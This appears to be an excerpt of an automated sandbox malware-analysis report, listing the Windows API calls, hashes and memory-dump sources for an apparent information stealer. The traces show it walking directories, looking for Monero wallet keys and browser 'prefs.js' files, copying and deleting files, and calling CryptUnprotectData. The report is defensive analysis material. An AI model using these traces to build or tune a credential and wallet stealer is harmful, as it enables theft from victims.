                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 0052fc76fa49e94281ad05ff2e1fd32084d39e035bfcc70c3de49b84f55f1965
                                • Instruction ID: a352f25004cf526c3a341c9ccad46b67003784b91eb1503246c3cc379bc01c3d
                                • Opcode Fuzzy Hash: 0052fc76fa49e94281ad05ff2e1fd32084d39e035bfcc70c3de49b84f55f1965
                                • Instruction Fuzzy Hash: 9D6132B2510218AFDB24EBE1DC49FEE737CBB98701F044598E50DA6141EB719B89CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C44580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C44587
                                • wsprintfA.USER32 ref: 00C445A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C445BD
                                • StrCmpCA.SHLWAPI(?,00C50FC4), ref: 00C445EB
                                • StrCmpCA.SHLWAPI(?,00C50FC8), ref: 00C44601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4468B
                                • FindClose.KERNEL32(000000FF), ref: 00C446A0
                                • lstrcat.KERNEL32(?,019FF2E0), ref: 00C446C5
                                • lstrcat.KERNEL32(?,019FDC60), ref: 00C446D8
                                • lstrlen.KERNEL32(?), ref: 00C446E5
                                • lstrlen.KERNEL32(?), ref: 00C446F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 26e06e9054ccaafbdbccfe2ffc29c7363d42788318e2c73957e509c20fd99df6
                                • Instruction ID: fda08bea7a7377850ac70992260fc8ed6d0a70d10086858a961417ce3bbaf0f7
                                • Opcode Fuzzy Hash: 26e06e9054ccaafbdbccfe2ffc29c7363d42788318e2c73957e509c20fd99df6
                                • Instruction Fuzzy Hash: 225143B2550218AFC724EBB0DC89BED737CBB94301F444599F61DA2190EB749BC88F92
                                APIs
                                • wsprintfA.USER32 ref: 00C43EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C43EDA
                                • StrCmpCA.SHLWAPI(?,00C50FAC), ref: 00C43F08
                                • StrCmpCA.SHLWAPI(?,00C50FB0), ref: 00C43F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4406C
                                • FindClose.KERNEL32(000000FF), ref: 00C44081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: d7380254acc4a9e0fe6fffd6fa9507c43e38a8be3382c8b8263b9b051e54673e
                                • Instruction ID: e15ac7b7fea8b75190069160d230e665734425f5aa783811955751221cacef27
                                • Opcode Fuzzy Hash: d7380254acc4a9e0fe6fffd6fa9507c43e38a8be3382c8b8263b9b051e54673e
                                • Instruction Fuzzy Hash: 975166B2900218AFDB24FBB1DC85EFE737CBB94300F044598B65DA6040DB759B898F55
                                APIs
                                • wsprintfA.USER32 ref: 00C3ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C3ED55
                                • StrCmpCA.SHLWAPI(?,00C51538), ref: 00C3EDAB
                                • StrCmpCA.SHLWAPI(?,00C5153C), ref: 00C3EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3F2AE
                                • FindClose.KERNEL32(000000FF), ref: 00C3F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: a2dc0c77194b3e865a951bdd1923189c539e1955ab2a11b27541413ca7bfa215
                                • Instruction ID: c90318334bd68be7631cac20649ba34647e7d6320c80811fdffaf9d20bd66810
                                • Opcode Fuzzy Hash: a2dc0c77194b3e865a951bdd1923189c539e1955ab2a11b27541413ca7bfa215
                                • Instruction Fuzzy Hash: DEE1C172951218AAFB54FB61DC52EEE7338FF54300F4145A9B50A62092EF306F8ADF52
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C515B8,00C50D96), ref: 00C3F71E
                                • StrCmpCA.SHLWAPI(?,00C515BC), ref: 00C3F76F
                                • StrCmpCA.SHLWAPI(?,00C515C0), ref: 00C3F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3FAB1
                                • FindClose.KERNEL32(000000FF), ref: 00C3FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: e82a525782b1dbe0e4e9ac28b5688fc184496b1ae9ffe3d53a9193b91fd5ebd6
                                • Instruction ID: ce60286ecaf54352c400ec3d6ef6586eed2758cfe666bafb22a56272c0b7325f
                                • Opcode Fuzzy Hash: e82a525782b1dbe0e4e9ac28b5688fc184496b1ae9ffe3d53a9193b91fd5ebd6
                                • Instruction Fuzzy Hash: EAB135719501189FEB24FF61DC56BEE7379BF94300F4085A8E80A96191EF305B4ADF92
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C5510C,?,?,?,00C551B4,?,?,00000000,?,00000000), ref: 00C31923
                                • StrCmpCA.SHLWAPI(?,00C5525C), ref: 00C31973
                                • StrCmpCA.SHLWAPI(?,00C55304), ref: 00C31989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00C31D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00C31DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C31E20
                                • FindClose.KERNEL32(000000FF), ref: 00C31E32
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 0aecccb04745fe0a132b0b93b095192a34a05f7090a50b2fcd39f22282db6e45
                                • Instruction ID: fdec33b041c14b9581fbc0c9109d3d91e4ab8e44855bb5a9eedb08c0f5d1414b
                                • Opcode Fuzzy Hash: 0aecccb04745fe0a132b0b93b095192a34a05f7090a50b2fcd39f22282db6e45
                                • Instruction Fuzzy Hash: 9A120F71950118ABEB19FB60DC96EEE7378FF54300F4145A9B50A62091EF306F89DFA2
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C50C2E), ref: 00C3DE5E
                                • StrCmpCA.SHLWAPI(?,00C514C8), ref: 00C3DEAE
                                • StrCmpCA.SHLWAPI(?,00C514CC), ref: 00C3DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3E3E0
                                • FindClose.KERNEL32(000000FF), ref: 00C3E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 4c09be76860beb4be9f20ab8666e7eb43e49e01939a1d5cca75cf107dd9a0f18
                                • Instruction ID: 111795a56ab692dda2279b2e851379373de36c8f767597a4cd725cb923326205
                                • Opcode Fuzzy Hash: 4c09be76860beb4be9f20ab8666e7eb43e49e01939a1d5cca75cf107dd9a0f18
                                • Instruction Fuzzy Hash: 79F1B1718641189AEB25FB61DC95EEE7338FF54304F8141E9B41A62091EF306F8ADF62
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ^gW$,=s{$,^7$A]w-$V5<$hs$jS_w$u1>?$!{$~~
                                • API String ID: 0-2523261931
                                • Opcode ID: 326cf0e2f6e3de6baffb6b9c9aff487e56f1e4f3444c59d68007c2fa949e11c5
                                • Instruction ID: 529d294f0c1bb2f32c4858a1879f96eae6f09a57e5790fd1e4d3296d2a6a566e
                                • Opcode Fuzzy Hash: 326cf0e2f6e3de6baffb6b9c9aff487e56f1e4f3444c59d68007c2fa949e11c5
                                • Instruction Fuzzy Hash: 8DB2E7F360C2049FE304AE2DEC8567AFBE9EFD4620F1A493DE6C4C7744E63598058696
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C514B0,00C50C2A), ref: 00C3DAEB
                                • StrCmpCA.SHLWAPI(?,00C514B4), ref: 00C3DB33
                                • StrCmpCA.SHLWAPI(?,00C514B8), ref: 00C3DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3DDCC
                                • FindClose.KERNEL32(000000FF), ref: 00C3DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: e3038d64ad225fc0ea0da398b119e0bd378e8190b4498a9b296e9cfbfd3b19e4
                                • Instruction ID: fc0bc6d1fd09dfed5cc20187a2ba5ae2c52d1dd8e3e6b1238503808740756472
                                • Opcode Fuzzy Hash: e3038d64ad225fc0ea0da398b119e0bd378e8190b4498a9b296e9cfbfd3b19e4
                                • Instruction Fuzzy Hash: C4915172910104ABDB14FBB1EC96AED737DBB84304F408668FC1A96181EE349B5DDB93
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: JK0($U2}m$di?$i/_$jqw3$rZvf$&Qy$20(
                                • API String ID: 0-2360829891
                                • Opcode ID: 4eab0e674bea5d75963062f865f0558dd11b7217444253e36b73f21f6e6df852
                                • Instruction ID: f5d922af0ea93873e506f1e163b504c97ad3cd19095536a3c3bba46b3a431d06
                                • Opcode Fuzzy Hash: 4eab0e674bea5d75963062f865f0558dd11b7217444253e36b73f21f6e6df852
                                • Instruction Fuzzy Hash: 3FB2F8F3A0C2149FE3046E2DEC8567AF7E9EF94720F16853DEAC493744EA3558048697
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,00C505AF), ref: 00C47BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00C47BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00C47C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00C47C62
                                • LocalFree.KERNEL32(00000000), ref: 00C47D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: a9b35d9a094cafaebf4e8f2da11b78130fca7a90a13bc09dd1d68155f5ac659d
                                • Instruction ID: a84943b41c37cd29da9ad5e61304c637b8bfae034f35d0997914ab652976b337
                                • Opcode Fuzzy Hash: a9b35d9a094cafaebf4e8f2da11b78130fca7a90a13bc09dd1d68155f5ac659d
                                • Instruction Fuzzy Hash: 42415C71950218ABDB24DF95DC99BEEB778FF44700F204299E50AA2181DB342F89CFA1
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00C50D73), ref: 00C3E4A2
                                • StrCmpCA.SHLWAPI(?,00C514F8), ref: 00C3E4F2
                                • StrCmpCA.SHLWAPI(?,00C514FC), ref: 00C3E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: d84e3eb952e26aae74e8874422d22aee6c1209320a88762b95a8648d4149bb90
                                • Instruction ID: c11abe0bff9ed55c2db3fd304ec223208bc92731c7e4f501e312f6b61ff20690
                                • Opcode Fuzzy Hash: d84e3eb952e26aae74e8874422d22aee6c1209320a88762b95a8648d4149bb90
                                • Instruction Fuzzy Hash: 06122172950118ABEB14FB60DC96EED7378BF54300F4145A9B90AA60D1EF306F89DF92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: A?$a_}l$gg$s2_'$u}0$1];
                                • API String ID: 0-4111299748
                                • Opcode ID: 769e82b9ea3e224ac906125750b60d4cdf8dc2312d09540611fa4a1d84f9a613
                                • Instruction ID: 8e0bab0d1343c43ba57349fb29e608cf91ad03a45b7a111728a7c187bb76e188
                                • Opcode Fuzzy Hash: 769e82b9ea3e224ac906125750b60d4cdf8dc2312d09540611fa4a1d84f9a613
                                • Instruction Fuzzy Hash: 61B228F3A0C6005FE3046E2DEC8567AFBE9EBD4320F1A863DEAC4C7744E97558058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 3^};$`v|v$aq$u3U$xm.?$zY5
                                • API String ID: 0-2992283585
                                • Opcode ID: fed33e208a51780b947a27befdc61830739d2b6ece479155ff2765c08d39fda2
                                • Instruction ID: dbc78e58250660be551adcd70bc1c994a96ea07c153c1b6d89c7450fdd51fa62
                                • Opcode Fuzzy Hash: fed33e208a51780b947a27befdc61830739d2b6ece479155ff2765c08d39fda2
                                • Instruction Fuzzy Hash: 55B22AF3A0C2109FE3086E2DDC8567AFBE5EF94320F1A493DEAC5C7744EA7558018696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !P(_$-B}G$/%;x$R*}$i7$m"~
                                • API String ID: 0-821411787
                                • Opcode ID: 010a6574bfb689c9372e75ee09cdc1517562e4d5eb5cf49defb64b2fea401e0a
                                • Instruction ID: fe2a866cd31f9c37fbf94b61916b35333d127658cd4925ca84b1fa314787547c
                                • Opcode Fuzzy Hash: 010a6574bfb689c9372e75ee09cdc1517562e4d5eb5cf49defb64b2fea401e0a
                                • Instruction Fuzzy Hash: C0B2F5F390C2049FE7046E2DEC8567ABBE9EF94320F1A493DEAC4D3744EA3558148697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: AbA$LMvw$ehu}$nuU$f[~
                                • API String ID: 0-3757762523
                                • Opcode ID: ec9feb3070a98e1357495f0b880e74a1510e9c8ab8193b4a0e60f85007f1f860
                                • Instruction ID: ec14168b2b80f211f08640fedbc98a5700c7c0c74ad7310a36dd3e018952a09e
                                • Opcode Fuzzy Hash: ec9feb3070a98e1357495f0b880e74a1510e9c8ab8193b4a0e60f85007f1f860
                                • Instruction Fuzzy Hash: 53B227F3A0C6049FE304AE2DEC8567AFBE5EF94320F1A893DE6C4C3744E93558058696
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00C3C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00C3C87C
                                • lstrcat.KERNEL32(?,00C50B46), ref: 00C3C943
                                • lstrcat.KERNEL32(?,00C50B47), ref: 00C3C957
                                • lstrcat.KERNEL32(?,00C50B4E), ref: 00C3C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: d46cc87b14b05618630190dcc774cd41ae2f954d66aab1ac3c172df59060d8ce
                                • Instruction ID: 209edd32ddd26877d9122c2758a04084483f6b48fb390c9d39b090e2c69315cc
                                • Opcode Fuzzy Hash: d46cc87b14b05618630190dcc774cd41ae2f954d66aab1ac3c172df59060d8ce
                                • Instruction Fuzzy Hash: ED415DB591421ADFDB10DF94DD89BFEB7B8BB88704F1441B8E509B6280D7705A88CF92
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00C3724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00C37254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00C37281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00C372A4
